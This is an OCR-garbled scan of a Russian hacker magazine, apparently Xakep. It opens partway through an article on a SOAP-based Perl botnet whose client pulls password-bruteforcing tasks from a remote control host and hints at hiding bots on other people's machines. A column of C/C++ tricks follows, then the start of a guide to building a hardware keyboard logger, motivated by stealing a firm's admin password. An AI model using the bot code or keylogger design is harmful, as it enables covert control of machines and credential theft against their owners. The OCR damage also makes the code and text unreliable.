управляющего модуля. Конечно, это касается только серверной части, в 
смыслеуправления раздачей заданий. 

Чтобы добавить поддержку нового функционала ботам, им необходимо 
будет отправить этот модуль. Но, вообще говоря, оченьлегко сделать 
функцию деШрсіаіюз и заставить ботов раз в несколько пусков прове- 
рять наличие апдейтов. Если они будут, сервер сам отправит в качестве 
данных код модуля, а ботлегко его проинсталлирует и сможетзаюзать в 
дальнейшем. Все делается просто: папка модулей-обработчиков заданий 
и динамическое подключение с помощью: 

гедиіге $:Еі1е_пате; 

Задание ботам можно посылать в виде хэша: 

{ 

Ьапсііег => ' НапсІІегЫате ' , #класс обработчика 

баба => { } , #пакет данных на обработку 

) 

Нуладно, вернемся к разбору сервера. Каквидно, во всех хэндлерах 
доступна служебная переменная $_[КЕРЫЕЦ которая является ссылкой 
на ядро, позволяющей вызывать методы ядра, такие как розі (бросить ис- 
ключением в другую сессию). Куда обратиться за более подробной инфор- 
мацией, ты знаешь, атутя приведутолькоте сведения, которые необходи- 
мы для понимания кода. Параметры, переданные сессии, доступны через 
$_[АР6О]...$_[АР09]. В случае обработчика _(МаиІ1: параметр $_[АП60] 

— имя события, по которому был дернут этот обработчик (так как на него 
падают все неразобранные события). 

$_[АП61] содержит ссылку на массив параметров, переданных событию. 
В случае модуля Р0Е::СотропепЕ:5егѵег::50АРэтим параметром будет 
объект5егѵег::50АР::Резропзе, про который нам нужно знатьтолько 
то, что посредством аксессора сопіепі в нем можно задать выходные 
данные. Можно получить также доступ к информации об ІР клиента, 
к методу, который был вызван, к ІІРІ и аргумента запроса через мето- 
ды $гезропзе->соппесііоп->геппо1е_ір(), $гезропзе->5оартеіИосІ(), 
$гезропзе->5оаргерие5І:->игі(), $гезропзе->зоарЬосІу() соответственно. 
Вот, собственно, и все. Остальной код обработчика сПзра1;сЬ_ппападег 
говорит сам за себя (в комментариях не нуждается), и каждый сможет 
доработать его напильником по вкусу — каркас есть. 

КОД КЛИЕНТА 

Перейдем к клиентской части. Сразу обращаем внимание на код из 
соответствующей врезки, его мы будем изучать. Как мы уже договари- 
вались выше, пусть боту нас ждет определенного события, например 
освобождения ресурсов, после чего запускается наш скрипт, посылаю- 
щий запрос на сервер и принимающий от него задание. Заложим воз- 
можность расширения функционала, но сейчас реализуем только одну 
функцию — перебор паролей. Более конкретно: наш ботждет падения 
уровня загрузки СРІІ ниже, скажем, 1 0%, после которого отправляет за- 
прос на получение задания, обрабатывает его и сразу отсылает на сер- 
вер результат обработки. Как работает сервер, мы разобрались, теперь 
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#!/изг/Ьіп/рег[ -ѵѵ 

##код клиент-бота для перебора паролей 

изезігісі; 

изе РОЕ; 

изе РОЕ::ѴѴЬееІ:: РоІІоѵѵТаіІ; 
изе 50АР::ТгапзрогЕ:НТТР; 
изе 50АР::І_і*е; 
изе СопігоІ::РегеЬогсбед; 

ту $іприі_еѵепі_пате = 'іііка'; 

Р0Е::5еззіоп->сгеаіе( 

‘ і п И пе_з1;а1:е5’ => { 

’_зіагі' => \&зіагі_ѵѵЬееІ, 

'_зіор' => \&зіор_ѵѵЬееІ, 

$іприі_еѵепі_пате =>\&5іагУоЬ, 

}, 

); 

зиб зіагі_\л/бееІ 

{ 

ту$ііІе_пате = ’іозіаі -ѵѵб Г; 

$_[НЕАР]->{ѵѵЬееІ} = РОЕ::ѴѴЬее[::ЕоиоѵѵТаі[->пеѵѵ( 

Еііепате => $ііІе_пате, # Еііеіоіаіі 

РоШпіегѵаІ=> 1 , # Ноѵѵоііеп іо сбеск іі 

ІприіЕѵепі => $іприі_еѵепі_пате, # Еѵепііо етіі ироп іприі 

); 

$_[КЕРЫ Еб]->а Ііа5_5е1;(‘ѵѵЬееІег’) ; 

} 

зиб зіор_\л/ЬееІ 

{ 

беіеіе $ [Н ЕАР]->{ѵѵЬееІ}; 

} 

зиЬЭіагУоЬ 

{ 

ту ($Ьеар, $1іпе, $ѵѵЬееІ) = 0_[НЕАР, АРОО, АР01]; 
ту $соипіег = $Иеар->{соипіег}++; 
ту$сри = (зрІііЛз+А $1іпе) [- 1 ] ; 
іі( =~/ л \б+$/ && $сри > 90) 

{ 

ту $игі = ‘МуНозі.сот/СопігоГ; #псевдоним 
ту $Иозі = ‘ геа [_Ьо5і. сот :3 1337’; #реальное местоположение 
ту $іипс_гедиезі = ‘деіТазк’; #имя метода 
ту$іипс_гедиезі = ’зеіАпзѵѵег’; 

#посылаем сообщение о готовности 
ту$оиі = 50АР::Уіе 
-> игі($игі) 

-> ргоху($бозі) 

-> $іипс_гедиезі($рагат) 

-> гезиіі; 

ту $бо = СопігоІ::РегеЬогсбед->пеѵѵ(); 

$оиі = $бо->ргосезз($оиі); 

$оиі = 50АР::Уіе 
-> игі($игі) 

-> ргоху($бозі) 

-> $іипс_гезропзе($оиі) 

-> гезиіі; 

} 

} 

$рое_кегпеІ->гип(); 



рассмотрим клиента. Клиентское сообщение с сервером реализовано в 
хэндлере ЗіагУоЬ, содержимое которого нам известно из предыдущей 
статьи. Скажутолько, что мы обращаемся кдвум методам — деіТазк 
и зеіАпзѵѵег, которых должно хватить для обработки чего угодно. Чуть 
более интересно самое начало этого метода ЗіагУоЬ, в котором мы 
обрабатываем строку вывода команды іозіаі. Вывод этой команды, суть 
которого интуитивно понятна, выглядит примерно так: 

[00:00:10 ЗаС РеЬ 31] [ іпзійегѲмМСеГюизе . доѵ ~] $ іозСаС -Ѵ7 1 
ССу асЮ асіі ай2 ори 



.іп 


. СоиС 


КВ/С 


Срз 


МВ/з 


кв/- 


Ь Срз 


МВ/з 


КВ/С Срз 


МВ/з 


из пі зу іп 


0 


-66 


9 .Ш 


8 


0 


.07 Ш 


.95 


3 


0 


.04 4 


.24 




0, 


.00 


2 


0 2 


0 96 


0 


231 


0.00 


0 


0 


.00 0 


.00 


0 


0. 


.00 0. 


.00 


0 


0. 


00 


0 


0 0 


0 100 


0 


78 


0.00 


0 


0. 


00 0. 


00 


0 


0. 


00 0. 


00 


0 


0. 


00 


0 


0 0 


0 100 



То есть чтобы отрезать последнюю колонку, мы делаем (зрІііЛз+А $1іпе)[- 1 ]. 
А поскольку каждые 20 строк повторяется заголовок«ііу...сри», чтобы 
его игнорировать, мы используем строку «$сри =~/ л \б+$/». Тут вроде все 
ясно. Еще более интересна первая строчка, в которой мы получаем пара- 
метр $_[Н ЕАР], представляющий собой уникальную для каждой сессии 
свалку всякой шняги. 

Порядок параметров определяется модулем, порождающим событие, 
которое перехватывается хэндлером ЗіагУоЬ, — РОЕ::ѴѴЬееі:: РоІІоѵѵТаіІ. 
Помнишья говорил о многоуровневой иерархии модулей РОЕ? Воттутона 
во всей красе, РОЕ: :ѴѴЬееІ — это набор зависимых от родительской сессии 
модулей для выполнения разныхтипичныхзадач. Про этот модуль нам 
достаточно знать только, чтоон позволяет следить за пополнением файла 
и генерит событие каждый раз, когда добавляется строка. Это событие 
мы и перехватываем в ЭіагУѵѵоЬ. А следим мы за пополнением «файла», 
поскольку механизм пайпов великолепно поддерживается перловыми 
файл-хэндл ерами. Собственно, пайпы в свое время и были введены для 
того, чтобы избавить администраторов от необходимости задействовать 
временные файлы в своих скриптах. Поэтому файл в стандартном выводе 
и пайп — братья-близнецы. 

Ну а дальше все ясно. Мы используем модуль-заглушку СопігоЕ:РегеЬогсИед. 
Нотут (в соответствии стем, о чем говорилось выше) легко можно при- 
менить более изощренную технику подключения модулей-обработчиков 
заданий. 

ЗАКЛЮЧЕНИЕ 

Итак, в этой статье мы рассмотрели куда более полезный пример ис- 
пользования 50АР, чем представленный в мартовском номере. Весь код 
работоспособен, однако для реального применения требует некоторой 
доработки, которую я оставлю на твоеусмотрение. Какты понимаешь, 
тема обширная, а подробному руководству нет места в рамкахжурнала. 

В мои задачи входило продемонстрироватьтебе ворох идей и пути их 
реализации. Кслову, я бы сделал возможность отмены заданий и какую- 
никакую систему распределения нагрузки ;). Ну и заглушки неплохо бы 
дописать, конечно. В общем, есть куда двигаться. К примеру, если доводка 
бота покажется тебе слишком простой задачей, можешь попытаться 
как-нибудь скрыть его от бдительного ока владельцев машины, если ты, 
конечно, вдруг вздумаешь использовать ботов не на своих компах (нет, не 
делай этого!), но это уже тема отдельной статьи... Ладно, что-то я увлекся. 
Экспериментируй, пробуй свои идеи и не бойся на первых порахзабивать 
гвозди микроскопом. Метод свободного эксперимента никогда не бывает 
проигрышным — ничего не получится, так хоть развлечешься. Короче, 
вперед! тг 
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ТЫРЕТРЮКА НАУГАД. 



Л\ 4 1 обход префикса «_» 

I Си-соглашение о передаче параметров (обычно обозначае- 
мое каксбесІотС Оесіагаііоп), которому подчиняются все Си-функции, 
еслитолько ихтип не специфицирован явно, заставляет компилятор 
помещать префикс «_» перед именем каждой функции, чтобы линкер 
могопределить, что он имеет дело именно с ссіесі, а не, скажем, с 
вісісаіі. 

Поэтому перед функциями категорически не рекомендуется ис- 
пользовать знак подчеркивания, особенно при смешанном стиле 
программирования (то есть когда функции ссіесі используются 
наряду с вісісаіі). В противном случае линкер может запутаться, 
вызвав совсем не ту функцию, или выдать ошибку, дескать, нет 
такой функции и ничего линковать я не буду, хотя на самом деле 
такая функция есть. Обычно это случается при портировании 
программы, написанной в одной среде разработки, под другие 
платформы. 

Ладно, а какбыть, если текст программы уже кишит функциями с 
префиксами «_», что, в частности, любит делать МісговоЙ, отмечая 
таким образом нестандартные функции, отсутствующие в АМ5І С? 
Переделывать программу, заменяя знаки подчеркивания чем-нибудь 
другим, себе дороже. Хорошо, если она вообще потом соберется. Аесли 
даже и соберется, то нет гарантий, что не появится кучи ошибок в самых 
разных местах. 

И воттут на помощь нам приходиттрюкачество. А именно — макросы. 
Допустим, мы имеем функцию_Ш и хотим избавиться отзнака подчер- 
кивания. Какэто мы делаем? Да очень просто: 

ИЗБАВЛЯЕМСЯ ОТ ПРЕФИКСОВ «_» ЧЕРЕЗ МАКРОСЫ 

#беЕіп _Е ( ) х_Е ( ) 

х_Е ( ) ; 



СТРУКТУРА, РЕАЛИЗУЮЩАЯ ДИНАМИЧЕСКИИ МАССИВ 

зЕгисЕ зЕгіпд 
{ 

іпЕ ІепдЕй; // длина строки 
сЕіаг баЕа [1] ; // память для строки 

} ; 

Элемент ІепдіЬ хранит длину строки, а сбагсіаіа [1] — это не сама строка 
(как можно подумать поначалу), а место, зарезервированное под нее. 
Осталосьтолько научиться работать с этим хозяйством. 

Рассмотрим следующий фрагмент кода, реализующий динамический 
массив: 

ПРАКТИЧЕСКИЙ ПРИМЕР ИСПОЛЬЗОВАНИЯ ДИНАМИЧЕСКИХ 
МАССИВОВ 

// некая строка с динамическим массивом внутри 
зЕгіпд* р2 = ... 

// выделение памяти, необходимой для строки размером 

// р2->1епдЦ]т 

зЕгисЕ зЕгіпд в = таііос ( 

зігеоЕ (вЕгисЕ вЕгіпд) + р2->1епдЕІі - 1) ; 

// инициализация элемента структуры ІепдЕЬ. 
в->1епдЦ]т = р2->1епдЦ]т; 

/ / копирование строки из р2 в в 
вЕгпсру (в->баЕа, р2->баЕа, р2->1епдЕІі) ; 

// освобождение в 
Егее (в) ; 

Ну и в чем здесь прикол? А втом, что языкСи, с его вольностями втрак- 
товке типов, позволяетнам выделить блок памяти произвольной длины 
и натянуть на него структуру зігіпд. При этом первые ячейки займет эле- 
мент ІепдіИтипа і пЕ, а остальное — данные строки, длина которой может 
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ОН ПОТОМУ, ЧТО ЮБИЛЕЙНЫЙ (В ШЕС- 
ТНАДЦАТЕРИЧНОЙ НОТАЦИИ). МЫЩЪХ 
ДОЛГО ГОТОВИЛСЯ КЭТОМУЗНАМЕНА- 



Фокус втом, что макросы разворачиваются препроцессором в Си-код, 
в котором зловредных префиксовуже не оказывается, и риск развалить 
программу минимален (однако не стоитзабывать, что макросы вносят 
множество побочных эффектов и обращаться с ними следует крайне 
осторожно). 



Трюки 
от крыса 

ЭТОТ ВЫПУСКТРЮКОВ В НЕКОТОРОМ 
СМЫСЛЕ ОСОБЕННЫЙ. А ОСОБЕННЫЙ 



динамические массивы 

\М Известно, что языкСи не поддерживаетдинамических масси- 
вов. Ну не поддерживает и всетут. Хотьтресни. Хоть убейся о «газель». 
Хоть грызи зубами лед. Адинамические массивы все равно нужны. 
Функции семейства таііос не в счет, поскольку они выделяют именно 
блок памяти, а не массив, что совсем не одного и тоже. 

И вот на этот случай есть один хитрый древний трюк, когда-то широко 
известный, но потом незаслуженно позабытый, хотя очень даже нужный 
и важный. Короче, рассмотрим следующую структуру: 



ТЕЛЬНОМУ СОБЫТИЮ, ОТБИРАЯ САМЫЕ 
ВКУСНЫЕТРЮКИ, НО... В КОНЦЕ КОНЦОВ 
ИХОКАЗАЛОСЬ СТОЛЬКО (И ОДИН ВКУС- 
НЕЕ ДРУГОГО), ЧТО ПРИШЛОСЬ ПРОСТО 
ПОДКИНУТЬ МОНЕТКУ И ВЫБРАТЬЧЕ- 







и не совпадать с баіа [1]. Действуя таким образом, мы можем, например, 
имитировать РА5САІ_-строки. Однако следует сказать, что с С++ этот 
трюк не работает, точнее, работает, но дает непредсказуемый результат, 
и потому применять его крайне опасно, это может позволить себетолько 
опытный программист. 

экономия памяти 

Допустим, нам потребовалось выделить три локальные 
перемен ныети па с На г и еще один массив типа сбаг[5]. Ну потребо- 
валось, что тут та ко го? Хорошо, тогда попробуй ответить на вопрос: 
сколько байт мы при этом израсходовали? Голос из толпы: «Восемь!» 
Всего восемь байт?! Это что же за компилятор такой у тебя?! Берем 
М5 ѴС (впрочем, с тем же успехом можно взять и любой другой) и 
компилируем следующий код: 

іоо() 

{ 

сііаг а; 
сііаг Ъ; 
сііаг с; 
сііаг сі [ 5 ] ; 

} 



Смотрим на откомпилированный код, дизассемблированный ЮА Рго 
(советую при этом крепко держаться за стул): 



ОТКОМПИЛИРОВАННЫЙ РЕЗУЛЬТАТ 



СехС : 00000000 


_Гоо 


ргос 


пеаг 




СехС : 00000000 




ризЪ 


еЪр 




СехС : 00000001 




шоѵ 


еЪр , 


езр 


СехС : 00000003 




зиЪ 


езр, 


14Ъ 


СехС : 00000006 




шоѵ 


езр, 


еЪр 


СехС : 00000008 




рор 


еЪр 




СехС : 00000009 




геСп 






СехС : 00000009 


_Гоо 


епЪр 







Откуда тут взялось 146 (20) байт локальной памяти?! Все очень 
просто. Компилятор в угоду производительности самопроизвольно 
выравнивает все переменные по границе двойного слова. Итого мы 
получаем 3*тах(1 ,4)+тах(5,8)=1 2+8=20. Вотони,наши20 «оптими- 
зированных» байт вместо ожидаемых пяти. 

А что делать, если нам не нужна такая «оптимизация»?! Все просто: 
гоним переменные в структуру, предварительно отключив выравни- 
вание соответствующей прагмой компилятора. К примеру, у М5 ѴС за 
это отвечает ключевое слово «#ргад та рас И [ п] )», где п - желаемая 
кратность выравнивания, в данном случае равная единице, то есть 
выравнивание производится по границе одного байта, то есть не 
производится вовсе. 

Переписанный код будет выглядеть приблизительно так: 

ОПТИМИЗИРОВАННЫЙ ВАРИАНТ С ОТКЛЮЧЕННЫМ 
ВЫРАВНИВАНИЕМ 

#ргадша раск ( 1 ) 
зСгисС Ъаг 
{ 

сііаг а; 
сЪаг Ъ; 
сііаг с; 
сііаг сі [ 5 ] ; 

} ; 



боо ( ) 



{ 

} 



зСгисС Ъаг Ъаг ; 



Смотрим на откомпилированный код, дизассемблированный все той 
же I БА Рго. 

0І5А5М-К0Д С ОТКЛЮЧЕННЫМ ВЫРАВНИВАНИЕМ 



СехС : 00000000 


_1оо 


ргос 


пеаг 




СехС : 00000000 




ризЪ 


еЪр 




СехС : 00000001 




шоѵ 


еЪр , 


езр 


СехС : 00000003 




зиЪ 


езр, 


8 


СехС : 00000006 




шоѵ 


езр, 


еЪр 


СехС : 00000008 




рор 


еЪр 




СехС : 00000009 




геСп 






СехС : 00000009 


_1оо 


епЪр 







Вот оно! Вот они, наши8 ожидаемых байт вместо непредвиденных 
20! Однако скорость доступа к переменным за счет отключения 
выравнивания слегка упала. Но с невыравненными данными 
процессоры научилисьэффективно бороться еще во времена Репііит 
II, а вот если данные не влезут в кэш первого уровня, тогда падения 
производительности действительно не избежать. 



загадка чистых виртуальных методов 

^^™ТВ предыдущих выпусках этой рубрики мы не касались воп- 
росов приплюснутого Си, но по случаю юбилея сделаем исключение. 
Как известно, влюбомучебникепоСи+тчернымпо белому написа- 
но, что невозможно создать экземпляр (іпзіапііаіе) класса, имеюще- 
го чистый виртуальный метод (риге ѵігіиаі теібосі), при условии, что 
он никогда не вызывается. В этом, собственно говоря, и заключается 
суть концепции абстрактных классов. 

Нов действительности не всему написанному стоит верить, и 
приплюснутый Си открывает достаточно большие возможности для 
трюкачества. Поставленную задачу можно решить, например, так: 



ТРЮКОВЫЙ КОД, СОЗДАЮЩИЙ ЭКЗЕМПЛЯР ОБЪЕКТА С ЧИСТОЙ 
ВИРТУАЛЬНОЙ ФУНКЦИЕЙ, КОТОРАЯ НИКОГДА НЕ ВЫЗЫВАЕТСЯ 



сіазз Ъазе { 
риЫіс : 



Ъазе ( ) ; 

ѵігСиа! ѵоіЪ Г ( ) = 0; 



} ; 



сіазз Ъегіѵесі : риЫіс Ъазе { 
риЫіс : 

ѵігСиаІ ѵоіЪ Г() {} 

} ; 



ѵоіЪ С (Ъазе& Ъ) { } 

Ъазе::Ъазе() (С ( * Ыііз ) ; } 

таіп ( ) { 

ЪегіѵеЪ Ъ; 

} 

После компиляции (использовался компилятор МісгобоЪ Ѵізиаі С++) 
мы увидим (смотри предыдущий код), что когда создается экземп- 
ляр б, конструктор базе:: базе вызывает функцию 6, передавая ей 
в качестве указателя Ібіз указатель набазе.нонена бегіѵеб, что, 
собственно говоря, и требовалось доказать, □с 
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ОІ_ІМ\^ ЗЕВ02Х2 

/ 01_ШУи@ПЕА1_.ХАКЕР.ГШ / / 8ЕВС2Х2@РВОМТ.ВІІ / 



Шпионим 
за тетей Клавой 

Создаем хардварный логгер клавиатуры 



УТАКОГО КРУТОГО ХАКЕРА, КАКТЫ, НАВЕРНОЕ, НЕ РАЗ ВОЗНИКАЛА СИТУАЦИЯ, 
КОГДАПРОГРАММНЫЕЛОГГЕРЫ КЛАВЫ НЕ МОГЛИ РЕШИТЬ ПОСТАВЛЕННЫХ ЗАДАЧ. 
НАПРИМЕР, ОТЛОВИТЬ ПАРОЛЬ ОТ БИОСА С ПОМОЩЬЮ ПРОГРАММНОГО КЕЙЛОГГЕРА, 
ЗАГРУЖАЕМОГО СИСТЕМОЙ, НЕВОЗМОЖНО. ЛИЧНО Я СТОЛКНУЛСЯ С ПОДОБНОЙ ПРО- 
БЛЕМОЙ, КОГДА МНЕ НУЖНО БЫЛО УЗНАТЬ АДМИНСКИЙ ПАРОЛЬ В ЛОКАЛЬНОЙ СЕТИ 
ОДНОЙ ФИРМЫ. ТОГДАЯ И ПОДУМАЛ, ЧТО БЫЛО БЫ ОЧЕНЬ КРУТО СДЕЛАТЬ «ЖЕЛЕЗ- 
НЫЙ» ЛОГГЕР, КОТОРЫЙ БЫ ПОДКЛЮЧАЛСЯ МЕЖДУ КЛАВИАТУРОЙ И КОМПЬЮТЕРОМ 
И ЛОВИЛ ВСЕ НАЖАТЫЕ КЛАВИШИ, НАЧИНАЯ С ВКЛЮЧЕНИЯ КОМПЬЮТЕРА. МОГУ 
ПОХВАСТАТЬСЯ: СДЕЛАТЬ ЭТО МНЕ УДАЛОСЬ. 



ПРИНЦИПЫ 

Для того чтобы сконструировать подобное устройство, сначала нужно 
разобраться стем, какже работает клавиатура. Есть два основныхтипа кла- 
виатур: АТ (старый стандарт) и Р5/2. Отличаются они только разъемами: АТ 
имеет О I N , а Р5/2 — ттЮІІЧ. Первый — большой круглый разъемчикс пятью 
штырьками, второй — маленький, каку мышки, с шестью пинами. По прото- 
колу обмена они полностью совместимы. Наверняка, ты видел переходники 
с широких старых разъемов на новые маленькие. Этот стандарт появился 
еще в 1984 году вместе с первым персональным компьютером ІВМ РС и 
используется по сей день, практически не претерпев никаких изменений. 
Клавиатура представляет собой матрицу кнопок (около восьми строк на 
1 6 колонок), которые снимаются контроллером клавиатуры и при нажатии 
передаются в виде скан-кодов в компьютер (не путать с АЭСІІ-кодами). 
Между клавиатурой и компьютером установлен двухсторонний обмен. 
Контроллер клавиатуры передает скан-коды нажатых клавиш: скан-код 
отпускания клавиши вместе со скан-кодом самой клавиши. Контроллер 
клавиатуры, находящийся на материнской плате компьютера, опреде- 
ляет функции клавиатуры (была ли, например, нажата клавиша <І\Іит 
Цоск>) и выдает ихуже в систему. Он можетуправлять контроллером, 
встроенным в клавиатуру, к примеру, моргать светодиодами на клавиа- 
туре, устанавливать скорость автоповтора клавиш и т.д. Проще говоря, в 
клавиатуре есть микросхема, которая все нажатые клавиши тупо кидает 
в провод, далее на материнской плате другая микросхема декодирует эти 
скан-коды и управляет клавиатурой. Следовательно, если мы подсо- 
единимся к проводу клавиатуры, будем слушать, что там происходит, и 
сохранять это в некоторую память, мы вполне сможем восстановить то, 
что набиралось на клавиатуре в этот момент. 



ПРОТОКОЛ РАБОТЫ С КЛАВИАТУРОЙ 

Общие принципы ясны, теперь выясним, по какому протоколу 
осуществляется обмен данными между клавиатурой и материнской 
платой. Надо сразу отметить, что клавиатура правит балом и являет- 
ся более приоритетным устройством на своем интерфейсе, нежели 
материнская плата. От разъема на материнской плате к клавиатуре 
идет четыре провода: общий пров од (6ЫВ),+5вольт, данные (Оаіа) 
и тактовый сигнал (Сіоск). Протокол работы клавиатуры после- 
довательный, то есть байт передается всего по одному проводу, 
синхронизируясь тактовым сигналом. В режиме покоя сигнал Сіоск 
находится в высоком уровне (логическая единица). Когда мы нажи- 
маем какую-либо клавишу, клавиатура начинает передачу данных. 
Тактовый сигнал принимает состояние логического нуля (переходите 
высокого уровня на низкий), и на шине данных выставляется нулевой 
бит. Этот бит называется Эіагі ЬЩ он дает контроллеру на мамке 
понять, что мы начинаем передачу данных. Далее тактовый сигнал 
вновь принимает значение логической единицы, и по новому спаду в 
логический ноль передается нулевой бит. Таким образом передают- 
ся все 8 бит кода, начиная с нулевого и заканчивая седьмым битом. 
Завершает передачу один бит четности (РагДу Віі), подтверждающий 
верность принятых данных, и стоп -бит (5іор ЬД), показывающий, что 
передача окончена и может передаваться следующий байт. Получа- 
ется, что одна посылка занимает 1 1 бит, включая вспомогательные 
биты. Более наглядно это представлено на картинках и на видео, 
которое ты найдешь на диске. Из этого следует, что нам в первую оче- 
редь нужно слушать сигнал Сіоск и по спаду его фронтов читать, что 
же у нас происходит на шине данных. 
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КЛАВИАТУРНЫЕ ДАННЫЕ 

Итак, с протоколом работы клавиатуры вроде бы все ясно. Теперь 
посмотрим, какиеже данные курсируют от клавиатуры к компьютеру и 
обратно. Эти данные можно разделить на три группы. 

1. Управляющие команды, посылаемые компьютером в клавиатуру. 
Например: ЕЕИ — <Резеі> — сброс клавиатуры. Эти команды могут зажи- 
гать светодиоды на клавиатуре, управлять ее работой и т.д. Интересная 
группа команд, позволяет весьма гибко переконфигурировать клавиа- 
туру и даже разогнать или замедлить ее (привет оверклокерам :] ]. Всего 
этих команд восемь, они имеют зарезервированные коды: ЕОЬ, ЕЕН, РОИ, 
РЗИ, Р4И, Р5Н, РЕИ и РРИ. Каждый код — это отдельная команда, назначе- 
ние которой ты можешьузнать из документации. 

2. Команды, посылаемые клавиатурой к компьютеру. 

Эта группа команд показывает нам статус клавиатуры или какие-то 
проблемы с обработкой. Например: 00 И — ошибка или переполнение 
буфера клавиатуры. Этих команд всего семь штук, они имеют коды: РАИ, 
ААИ, ЕЕИ, РЕИ, РОИ 00И и РР. Нам интересны две команды: ААИ и РОИ. 
Команда ААИ показывает, что самотестирование при подаче питания 
прошло успешно. Теперь мы можем быть на 100%уверены, что клавиа- 
тура включена. С момента прохода этой команды по проводам мы можем 
смело запускать наш л оггер и следить за набираемыми клавишами на 
клавиатуре. Кстати, когда при загрузке биос ругается на отсутствие 
клавиатуры, он сообщает нам, что не получил ту самую команду ААИ 
— самотестирование клавы не прошло успешно. РОИже показывает, что 
была отжата нажатая клавиша. 

3. И, наконец, самая главная группа данных, посылаемых клавиатурой ком- 
пьютеру, — это скан-коды нажатых клавиш. Как я уже говорил, скан-коды 



большинства клавиш занимают 1 байт. К примеру, у клавиши <Р1 > 
скан-код будетОбИ. Но есть и расширенные клавиши, скан-код которых 
занимает2 и более байт. Например: у правого <АІП> скан-код будет вы- 
глядеть как Е0 1 1 И, а у клавиши <Раиве> — Е1 14 77 Е 1 Е0 14 Е0 77И, целых 
8 байт! Отсюда интересный вывод, что количество и функциональность 
клавиш можно расширять бесконечно и ты можешь сам сделать собст- 
венную клавиатуру с любым возможным числом клавиш, назначив им 
любые функции: от управления Винампом до пуска ядерных боеголовок. 
Для примеру покажу, какие команды пойдут в компьютер при наборе на 
клавиатуре моего ника сШпуд 

23 РО 23 4В РО 4В 43 РО 43 31 РО 31 35 РО 35 ЗВ РО ЗВЪ. 

Тут все логично, скан-коды клавиш будут такие: б=23Ь, 1=4ВЬ, І=43Н, 
п=31 И, у=35Ь, і=ЗВЬ, а РОИ является командой, которая показывает, какая 
клавиша в какой момент была отжата. То есть сначала посылается код 
нажатой клавиши, затем при отжатии — команда о том, что клавиша была 
отжата, и код отжатой клавиши. Ты можешь в любом порядке зажать не- 
сколько клавиш и в другом порядке их отжать, компьютер это воспримет. 

ПОСТАНОВКА ЗАДАЧИ 

Обычно разработка устройства начинается с железной части, а потом 
уже к железу пишется программа. Номы все делали одновременно: и 
паяли железо, и писали ПО. Однако принципы построения аппаратной 
части были заложены еще на этапе идеи. 

Для начала надо очертить круг задач, которые мы поставили, изго- 
тавливая этотлоггер. Задача перед нами стояла следующая: создать 
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> СІѴСІ 

На дискеты найдешь 
видео с этапами 
отладки и проверки 
устройства, а также 
спецификацию 
разъемов мобильных 
телефонов, мануалы 
по контроллерам, 
использованным 
в статье, исходный 
код и программы для 
слива и перекоди- 
ровки полученных 
данных. 




/«ѵ 



> ІП^О 

Если тебя очень 
заинтересовала эта 
статья и руки че- 
шутся собрать такое 
устройство, но, что- 
бы сделать плату, не 
хватает ни знаний, 
ни возможностей, то 
специально для тебя 
я подготовил КІТ- 
набор для пайки. В 
него входит плата, 
прошитый контрол- 
лер и необходимая 
рассыпуха. Купить 
этот чудесный ком- 
плекты можешь на 
ННр://сотриіег.ігіЬ. 
ги/ргісе.рбр?ісІ 
каі=4974. 



устройство, вставляемое в разрыв провода клавиатуры и 
отслеживающее нажатие клавиш. Дальше это устройство, 
в зависимости от конфигурации программы, должно было 
быть способно сохранять нажатые клавиши в энергонеза- 
висимую память. Затем надо было реализовать возмож- 
ность снятия этого лога через компьютерный интерфейс, 
например 115В. Важно было учесть и различные варианты 
развития этого устройства: подключение радиопередат- 
чика, сохранение больших массивов данных, перевод в 
АЗСІІ-код на ходу, сопряжение с множеством компьютер- 



протокола Р5-232. Он послужит нам для связи контроллера 
с компьютером через согласующие схемы. Но главное, что 
наш процессор может обрабатывать внешнее прерывание. 
Есть ножка контроллера, которая может реагировать на смену 
сигнала. Например, если у нас сигнал в логической единице, 
то будет обрабатываться прерывание. Нам необходимо 
настроить устройство так, чтобы прерывание срабатывало 
поспаду (то есть переходу с логической единицы на ноль) 
сигнала СШСКв клавиатуре. Проводок йаіа мы подсоеди- 
ним к ножке ІІМТ1 . Прерывание он обрабатывать не будет. 




Плата с ЕТ232ВМ 

ных интерфейсов. Забегая вперед, скажу, что в нашем уст- 
ройстве реализованы все возможные способы расширения 
его функциональности. 

Мы выбрали процессоры семейства АѴР. Они идеально 
подходят для поставленной задачи: они недорогие, весьма 
простые в освоении (смотри сентябрьский номер ][за 2006 год 

— там я писал, как начатье ними работать), у них обильная 
периферия, естьоперативная и, что самое главное, энерго- 
независимая память — ЕРПОМ. Из семейства мы отобрали 
наиболее простой и дешевый АТ0пу2313. Этот камушекстоит 
всего $1 ,5-2, имеет на своем борту 2 Кб программной памяти, 
128байтоперативки и столько же энергонезависимой памя- 
ти. Такжеу него есть важные для нас последовательные ин- 
терфейсы 5РІ и ІІАРТ. По 5РІ мы можем подключать внешнюю 
память (например, ММС-карточку на 4 Гб) или с помощью 
программатора, прямо неотключая наш девайсот клавиату- 
ры, сливать содержимоеэнергонезависимой памяти. ІІАРТ 

— этоасинхронный приемопередатчик, расширенная версия 



Это сделано для того, чтобы, не сильно изменяя код, можно 
было легко перенести его под другой процессор — ІІЧТО и I N11 
всегда находятся на одних итехже пинах порта й на любом 
процессоре семейства АѴП: Рй2 и РОЗ. 

Сливать данные из ЕРПОМ можно двумя способами. Первый 
способ — скачивать неперекодированные данные с помо- 
щью программатора, а затем перекодировать своей про- 
граммой. Такой способ хорош тем, что не нужно морочиться 
с всевозможными интерфейсами и т.п. Просто несколько 
проводов на ЕРТ-порт и все. Второй вариант — сливать 
уже подготовленный текст в АЗСІІ-кодах по порту П5-232. 
Для этого у процессора предусмотрены ножки ПХ и ТХ, каку 
СОМ-порта. 

Но не торопись сразу подключать процессор напрямую к 
компьютеру — ты его просто спалишь. Дело в том, что уро- 
вень сигналов СОМ-порта отличен от такового у процессо- 
ра. Логический ноль у СОМ-порта кодируется как -1 5 вольт, 
а единица — как + 15 вольт. Ау процессора — от нуля до 
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+5 вольт. Существуют схемы согласования, множество которыхты 
найдешь в интернете и радиожурналах. Самый простой путь — это 
использовать шнурокдля мобильника, который на рынке стоит всего 
30 рублей. Он на 115В, но на конце его есть заветные контакты РХ и ТХ, 
которые должны подсоединяться кмобильнику. Еслиты подключишь 
его к 115 В и поставишь все необходимые драйверы, то у тебя в системе 
появится еще один СОМ -порт. Распиновки таких шнурков можешь най- 
ти у нас на диске. Сигнал РХ означает прием, а ТХ — передачу. Поэтому 
сигнал РХ микросхемы следует цеплять на ТХ ножку процессора и, 
наоборот, ТХ микрушки — на РХ МК. 

